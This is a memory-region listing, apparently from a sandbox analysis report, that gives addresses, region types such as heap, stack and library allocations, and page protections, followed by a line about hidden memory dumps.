page read and write
62C5000
trusted library allocation
page read and write
4E7F000
heap
page read and write
6C7000
heap
page read and write
A3E0000
trusted library allocation
page read and write
62DD000
trusted library allocation
page read and write
2F10000
heap
page read and write
1D60000
trusted library allocation
page read and write
330000
trusted library allocation
page read and write
9FEF000
stack
page read and write
3F0000
heap
page read and write
27A2000
trusted library allocation
page read and write
574F000
stack
page read and write
22D0000
trusted library allocation
page read and write
AAE000
stack
page read and write
5390000
heap
page read and write
42B0000
trusted library allocation
page read and write
515000
heap
page read and write
519E000
stack
page read and write | page guard
780000
trusted library allocation
page read and write
2792000
trusted library allocation
page read and write
30F3000
heap
page read and write
4F7E000
heap
page read and write
461B000
stack
page read and write
5CEE000
stack
page read and write
4CBE000
stack
page read and write
226000
heap
page read and write
5B1E000
stack
page read and write
9B000
stack
page read and write
2BA0000
heap
page read and write
3B0C000
heap
page read and write
26C2000
trusted library allocation
page read and write
5D30000
heap
page read and write
98FE000
stack
page read and write
2773000
trusted library allocation
page read and write
A370000
trusted library allocation
page read and write
516000
heap
page read and write
396F000
stack
page read and write
271F000
stack
page read and write
A3E0000
trusted library allocation
page read and write
3331000
trusted library allocation
page read and write
2B90000
heap
page read and write
3AFA000
heap
page read and write
258A000
trusted library allocation
page read and write
4F30000
heap
page read and write
4DE000
stack
page read and write
A561000
trusted library allocation
page read and write
1F50000
trusted library allocation
page read and write
9B60000
heap
page read and write
536E000
stack
page read and write
5E4F000
stack
page read and write
6310000
heap
page read and write
3AFB000
heap
page read and write
9BE000
stack
page read and write
24D000
trusted library allocation
page execute and read and write
1CD000
trusted library allocation
page execute and read and write
3AF9000
heap
page read and write
4E20000
heap
page read and write
7A0000
trusted library allocation
page read and write
5D34000
heap
page read and write
2592000
trusted library allocation
page read and write
264000
heap
page read and write
700000
heap
page execute and read and write
59E000
heap
page read and write
A3E0000
trusted library allocation
page read and write
2D0000
remote allocation
page read and write
30F0000
heap
page read and write
2381000
trusted library allocation
page read and write
9C2E000
stack
page read and write
277000
trusted library allocation
page execute and read and write
23B5000
trusted library allocation
page read and write
3AD000
heap
page read and write
3040000
heap
page read and write
592000
heap
page read and write
510E000
stack
page read and write
327000
stack
page read and write
211E000
stack
page read and write
3AA6000
heap
page read and write
5A0000
heap
page read and write
62B1000
trusted library allocation
page read and write
25A000
trusted library allocation
page read and write
3479000
trusted library allocation
page read and write
8561000
trusted library allocation
page read and write
3D0000
heap
page read and write
312F000
heap
page read and write
2B7F000
stack
page read and write
3330000
trusted library allocation
page read and write
22AE000
stack
page read and write
4ED000
heap
page read and write
5A2000
heap
page read and write
320000
trusted library allocation
page read and write
239C000
heap
page read and write
4F05000
heap
page read and write
2460000
heap
page execute and read and write
261E000
stack
page read and write
4BEE000
stack
page read and write
3E6000
heap
page read and write
5B0000
heap
page read and write
25D000
heap
page read and write
592000
heap
page read and write
490000
trusted library allocation
page read and write
6C0000
heap
page read and write
280000
trusted library allocation
page execute and read and write
244000
trusted library allocation
page read and write
324000
heap
page read and write
319E000
stack
page read and write
26C7000
trusted library allocation
page read and write
1EE0000
trusted library allocation
page read and write
4E49000
heap
page read and write
4F39000
heap
page read and write
750000
heap
page read and write
3AD000
stack
page read and write
9561000
trusted library allocation
page read and write
60E0000
heap
page read and write
233E000
heap
page read and write
59E000
heap
page read and write
A330000
heap
page read and write
2466000
heap
page execute and read and write
48E000
stack
page read and write
20C0000
trusted library allocation
page read and write
4B0F000
stack
page read and write
518000
heap
page read and write
2B94000
heap
page read and write
527000
heap
page read and write
4D4000
heap
page read and write
5F5E000
stack
page read and write
1F40000
heap
page read and write
2A7E000
stack
page read and write
235F000
heap
page read and write
4982000
heap
page read and write
4B0000
trusted library allocation
page read and write
597000
heap
page read and write
A3E0000
trusted library allocation
page read and write
2254000
heap
page read and write
246F000
stack
page read and write
10000
heap
page read and write
24B000
stack
page read and write
559000
heap
page read and write
255C000
trusted library allocation
page read and write
10000
heap
page read and write
1FAE000
stack
page read and write
49C000
stack
page read and write
1E30000
heap
page read and write
4C3F000
stack
page read and write
542000
heap
page read and write
51EE000
stack
page read and write
3332000
trusted library allocation
page read and write
20BE000
stack
page read and write
2454000
trusted library allocation
page read and write
32F000
heap
page read and write
4F8000
heap
page read and write
4E6000
heap
page read and write
4F60000
heap
page read and write
30C000
stack
page read and write
5AA000
heap
page read and write
260000
trusted library allocation
page read and write
4960000
heap
page read and write
A3E0000
trusted library allocation
page read and write
2A3F000
stack
page read and write
2849000
trusted library allocation
page read and write
There are 595 hidden memdumps, click here to show them.